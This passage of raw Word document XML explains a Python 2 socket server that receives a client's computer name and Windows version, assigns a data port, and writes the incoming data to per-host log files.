          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        sock.bind((host, port))</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        sock.listen(</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">while </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            (csock, caddr) = sock.accept()</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            ComputerName = csock.recv(</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>1024</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            WindowsVersion = csock.recv(</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>1024</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">print </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>"Computer: {}"</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.format(ComputerName)</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">print </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>"Windows Version: {}"</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.format(WindowsVersion)</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            sock2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            sock2.bind((host, </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            uport = sock2.getsockname()[</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            sock2.close()</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            csock.send(str(uport) + </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            thread.start_new_thread(DataChannel, (uport, ComputerName, WindowsVersion))</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">__name__ == </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>"__main__"</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    Server()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A23CE" w:rsidRDefault="003A23CE" w:rsidP="00BA1B8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2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B81AF2" w:rsidRDefault="00B81AF2" w:rsidP="00B81AF2">
      <w:r>
        <w:t xml:space="preserve">On the first connection from APTIDS, APTIDS sends its computer name and windows version to Server. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B81AF2" w:rsidRDefault="00B81AF2" w:rsidP="00B81AF2">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">            ComputerName=</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>csock.recv(</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>1024</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            WindowsVersion = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>csock.recv</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>1024</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A23CE" w:rsidRDefault="003A23CE" w:rsidP="00B81AF2">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B81AF2" w:rsidRDefault="00B81AF2" w:rsidP="00B81AF2">
      <w:r>
        <w:t>Server then finds an available port and sends back to APTIDS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B81AF2" w:rsidRDefault="00B81AF2" w:rsidP="00B81AF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2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B81AF2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">sock2 = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B81AF2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>socket.socket</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B81AF2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(socket.AF_INET, socket.SOCK_STREAM)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B81AF2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">sock2.bind((host, </w:t>
      </w:r>
      <w:r w:rsidRPr="00B81AF2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00B81AF2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
      <w:r w:rsidRPr="00B81AF2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>uport = sock2.getsockname()[</w:t>
      </w:r>
      <w:r w:rsidRPr="00B81AF2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00B81AF2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00B81AF2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>sock2.close()</w:t>
      </w:r>
      <w:r w:rsidRPr="00B81AF2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">csock.send(str(uport) + </w:t>
      </w:r>
      <w:r w:rsidRPr="00B81AF2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00B81AF2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r w:rsidRPr="00B81AF2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00B81AF2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A23CE" w:rsidRDefault="003A23CE" w:rsidP="00B81AF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2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B81AF2" w:rsidRDefault="00B81AF2" w:rsidP="00B81AF2">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Server creates new thread for binding and listening on that port, and use computer name and windows version for writing log to file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A23CE" w:rsidRDefault="003A23CE" w:rsidP="003A23CE">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22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DataChannel(</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E4E4FF"/>
        </w:rPr>
        <w:t>dport</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, computerName, windowsVersion):</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR,</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    sock.bind((host, </w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E4E4FF"/>
        </w:rPr>
        <w:t>dport</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    sock.listen(</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">while </w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        (csock, caddr) = sock.accept()</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        data = csock.recv(</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1024</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>)[:-</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">print </w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        logFile = open(</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"{0}.{1}"</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">.format(computerName, windowsVersion) + </w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>".log"</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
